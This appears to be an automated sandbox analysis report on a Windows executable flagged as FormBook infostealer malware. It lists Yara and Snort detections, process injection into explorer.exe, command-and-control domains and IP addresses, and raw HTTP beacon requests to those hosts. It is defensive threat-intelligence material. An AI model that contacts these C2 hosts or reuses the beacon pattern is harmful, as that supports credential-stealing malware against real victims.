Windows Analysis Report
mQY9ka5sW6hv2Ri.exe

AI detected suspicious sample

Source: Yara match	File source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.mQY9ka5sW6hv2Ri.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.4091352522.0000000000800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4091996606.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1771101612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4091719375.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1660916542.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: mQY9ka5sW6hv2Ri.exe

Joe Sandbox ML: detected

Source: C:\Windows\SysWOW64\msdt.exe

Code function: 6_2_008AAFB8 CertGetCertificateContextProperty,GetLastError,CryptHashCertificate,GetLastError,GetLastError,CertFreeCertificateContext,

6_2_008AAFB8

Source: mQY9ka5sW6hv2Ri.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: mQY9ka5sW6hv2Ri.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: msdt.pdbGCTL source: mQY9ka5sW6hv2Ri.exe, 00000004.00000002.1771720567.00000000010F0000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, 00000006.00000002.4091465372.0000000000870000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: mQY9ka5sW6hv2Ri.exe, 00000004.00000002.1771924925.0000000001160000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000006.00000003.1771716252.00000000046B8000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000006.00000003.1773310292.0000000004863000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000006.00000002.4092239644.0000000004BAE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000006.00000002.4092239644.0000000004A10000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: mQY9ka5sW6hv2Ri.exe, mQY9ka5sW6hv2Ri.exe, 00000004.00000002.1771924925.0000000001160000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, msdt.exe, 00000006.00000003.1771716252.00000000046B8000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000006.00000003.1773310292.0000000004863000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000006.00000002.4092239644.0000000004BAE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 00000006.00000002.4092239644.0000000004A10000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: msdt.pdb source: mQY9ka5sW6hv2Ri.exe, 00000004.00000002.1771720567.00000000010F0000.00000040.10000000.00040000.00000000.sdmp, msdt.exe, msdt.exe, 00000006.00000002.4091465372.0000000000870000.00000040.80000000.00040000.00000000.sdmp

Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008B60A8 memset,GetProcessHeap,HeapAlloc,FindFirstFileW,GetProcessHeap,HeapAlloc,GetLastError,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	6_2_008B60A8
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008A602D GetProcessHeap,HeapAlloc,FindFirstFileW,_wcsicmp,_wcsicmp,SetFileAttributesW,GetLastError,DeleteFileW,GetLastError,FindNextFileW,FindClose,RemoveDirectoryW,GetLastError,GetProcessHeap,HeapFree,	6_2_008A602D
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008A1B92 memset,GetProcessHeap,HeapAlloc,FindFirstFileW,_wcsicmp,_wcsicmp,FindNextFileW,FindClose,GetLastError,GetProcessHeap,HeapFree,	6_2_008A1B92
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008A4CB6 memset,GetProcessHeap,HeapAlloc,FindFirstFileW,_wcsicmp,_wcsicmp,FindNextFileW,FindClose,GetLastError,GetProcessHeap,HeapFree,	6_2_008A4CB6
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008A5C20 memset,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,CloseHandle,FindFirstFileW,_wcsicmp,_wcsicmp,GetFileAttributesW,SetFileAttributesW,GetLastError,GetFileAttributesW,SetFileAttributesW,GetLastError,DeleteFileW,CreateFileW,GetLastError,CloseHandle,FindNextFileW,FindClose,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	6_2_008A5C20
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008B743A memset,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,FindFirstFileW,_wcsicmp,_wcsicmp,CopyFileW,GetLastError,FindNextFileW,FindClose,GetLastError,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,	6_2_008B743A
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 6_2_008A4EDC memset,GetProcessHeap,HeapAlloc,FindFirstFileW,_wcsicmp,_wcsicmp,FindNextFileW,FindClose,GetLastError,GetProcessHeap,HeapFree,	6_2_008A4EDC

Source: C:\Users\user\Desktop\mQY9ka5sW6hv2Ri.exe	Code function: 4x nop then pop ebx		4_2_00407B26
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 4x nop then pop ebx		6_2_00807B26

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49741 -> 185.53.179.90:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49743 -> 3.226.182.14:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49744 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49745 -> 104.21.74.89:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49746 -> 185.151.30.212:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49747 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49748 -> 147.92.43.172:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 3.226.182.14 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.53.179.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.151.30.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 147.92.43.172 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 3.33.130.190 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.74.89 80	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.cpuk-finance.com/dy13/

Performs DNS queries to domains with low reputation

Source:

DNS query: www.b0ba138.xyz

Source: global traffic	HTTP traffic detected: GET /dy13/?Cj9LK=8pm41D0p&0N=QEHoM+aYI3hCf+czBdOSz9RRIKYxAFZVZwkeDGKMWY6YfTbawsJCAKRBbAifn9DzIiC0 HTTP/1.1Host: www.real-estate-96841.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy13/?Cj9LK=8pm41D0p&0N=ZKZE34nO5+VJCQ7V97/Oxkx+yV2XZDJ4QNe5btj3ut8Iv1OZ3MT37vqx38H3jKbLJXyY HTTP/1.1Host: www.sdplat.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy13/?0N=KHSNHic8JLxjXMUSHETQCf7bHtnol1DEJErUxVAiAFyfNffMOGuO7wY/4dfl/zB0OOAe&Cj9LK=8pm41D0p HTTP/1.1Host: www.soloparentconnect.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy13/?Cj9LK=8pm41D0p&0N=LVVXn+3XMgScWvA+gustfxAGGBCnrJhvM+qFjqFs2KSrXwfcw3kbTxGlCeyN42Y88s8h HTTP/1.1Host: www.b0ba138.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy13/?Cj9LK=8pm41D0p&0N=gDxxMnt83apdqDd0VF+A3hDmBOM78/3mfYHyjE1VNrqBuQQdV+RDpqUMPHOMA9Jp0yBU HTTP/1.1Host: www.cpuk-finance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy13/?Cj9LK=8pm41D0p&0N=LqTJXJ5089mrTceMc0p83ZaAEN5I+KgWBnSPa3/fnIguC6SsnRdV26ZHA6opskXgqsBG HTTP/1.1Host: www.umeshraja.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy13/?0N=AG4Ye1FrkmCiFPqbKlnZ1dM6YK/DoI/B/9McINMFJI+SypkU6UbY406xkx1Fqy5gp249&Cj9LK=8pm41D0p HTTP/1.1Host: www.883106.photosConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 3.226.182.14 3.226.182.14
Source: Joe Sandbox View	IP Address: 185.53.179.90 185.53.179.90

Source: Joe Sandbox View	ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: Joe Sandbox View	ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
Source: Joe Sandbox View	ASN Name: TWENTYIGB TWENTYIGB
Source: Joe Sandbox View	ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 5_2_0FBBCF82 getaddrinfo,setsockopt,recv,

5_2_0FBBCF82

Source: global traffic	HTTP traffic detected: GET /dy13/?Cj9LK=8pm41D0p&0N=QEHoM+aYI3hCf+czBdOSz9RRIKYxAFZVZwkeDGKMWY6YfTbawsJCAKRBbAifn9DzIiC0 HTTP/1.1Host: www.real-estate-96841.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy13/?Cj9LK=8pm41D0p&0N=ZKZE34nO5+VJCQ7V97/Oxkx+yV2XZDJ4QNe5btj3ut8Iv1OZ3MT37vqx38H3jKbLJXyY HTTP/1.1Host: www.sdplat.mediaConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy13/?0N=KHSNHic8JLxjXMUSHETQCf7bHtnol1DEJErUxVAiAFyfNffMOGuO7wY/4dfl/zB0OOAe&Cj9LK=8pm41D0p HTTP/1.1Host: www.soloparentconnect.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy13/?Cj9LK=8pm41D0p&0N=LVVXn+3XMgScWvA+gustfxAGGBCnrJhvM+qFjqFs2KSrXwfcw3kbTxGlCeyN42Y88s8h HTTP/1.1Host: www.b0ba138.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy13/?Cj9LK=8pm41D0p&0N=gDxxMnt83apdqDd0VF+A3hDmBOM78/3mfYHyjE1VNrqBuQQdV+RDpqUMPHOMA9Jp0yBU HTTP/1.1Host: www.cpuk-finance.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy13/?Cj9LK=8pm41D0p&0N=LqTJXJ5089mrTceMc0p83ZaAEN5I+KgWBnSPa3/fnIguC6SsnRdV26ZHA6opskXgqsBG HTTP/1.1Host: www.umeshraja.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /dy13/?0N=AG4Ye1FrkmCiFPqbKlnZ1dM6YK/DoI/B/9McINMFJI+SypkU6UbY406xkx1Fqy5gp249&Cj9LK=8pm41D0p HTTP/1.1Host: www.883106.photosConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic	DNS traffic detected: DNS query: www.real-estate-96841.bond
Source: global traffic	DNS traffic detected: DNS query: www.taini00.net
Source: global traffic	DNS traffic detected: DNS query: www.sdplat.media
Source: global traffic	DNS traffic detected: DNS query: www.soloparentconnect.com
Source: global traffic	DNS traffic detected: DNS query: www.b0ba138.xyz
Source: global traffic	DNS traffic detected: DNS query: www.imuschestvostorgov.online
Source: global traffic	DNS traffic detected: DNS query: www.cpuk-finance.com
Source: global traffic	DNS traffic detected: DNS query: www.acc-pay.top
Source: global traffic	DNS traffic detected: DNS query: www.umeshraja.com
Source: global traffic	DNS traffic detected: DNS query: www.883106.photos
Source: global traffic	DNS traffic detected: DNS query: www.484844.vip

Source: explorer.exe, 00000005.00000000.1665871823.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4095689522.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105812901.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3426278192.0000000009833000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000005.00000000.1665871823.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4095689522.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105812901.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3426278192.0000000009833000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000005.00000000.1665871823.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4095689522.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105812901.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3426278192.0000000009833000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000005.00000000.1665871823.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4095689522.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105812901.0000000009830000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3426278192.0000000009833000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000005.00000002.4093721221.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1663822771.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000005.00000000.1674090829.000000000CA63000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4102382128.000000000CA63000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.mi
Source: explorer.exe, 00000005.00000000.1674090829.000000000CA63000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4102382128.000000000CA63000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.micr
Source: explorer.exe, 00000005.00000000.1664847019.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1665286520.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1666809306.0000000009B60000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.484844.vip
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.484844.vip/dy13/
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.484844.vip/dy13/www.manga-house.com
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.484844.vipReferer:
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.883106.photos
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.883106.photos/dy13/
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.883106.photos/dy13/www.tyupok.xyz
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.883106.photosReferer:
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.acc-pay.top
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.acc-pay.top/dy13/
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.acc-pay.top/dy13/www.umeshraja.com
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.acc-pay.topReferer:
Source: mQY9ka5sW6hv2Ri.exe, 00000000.00000002.1662597721.0000000006B12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.1672208552.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3106196438.000000000C9E7000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.b0ba138.xyz
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.b0ba138.xyz/dy13/
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.b0ba138.xyz/dy13/www.imuschestvostorgov.online
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.b0ba138.xyzReferer:
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bdsmnutzbar.info
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bdsmnutzbar.info/dy13/
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bdsmnutzbar.info/dy13/H
Source: explorer.exe, 00000005.00000002.4102542899.000000000CB46000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105191318.000000000CB1E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3167076802.000000000CB36000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105362141.000000000CB28000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3425966147.000000000CB36000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bdsmnutzbar.infoReferer:
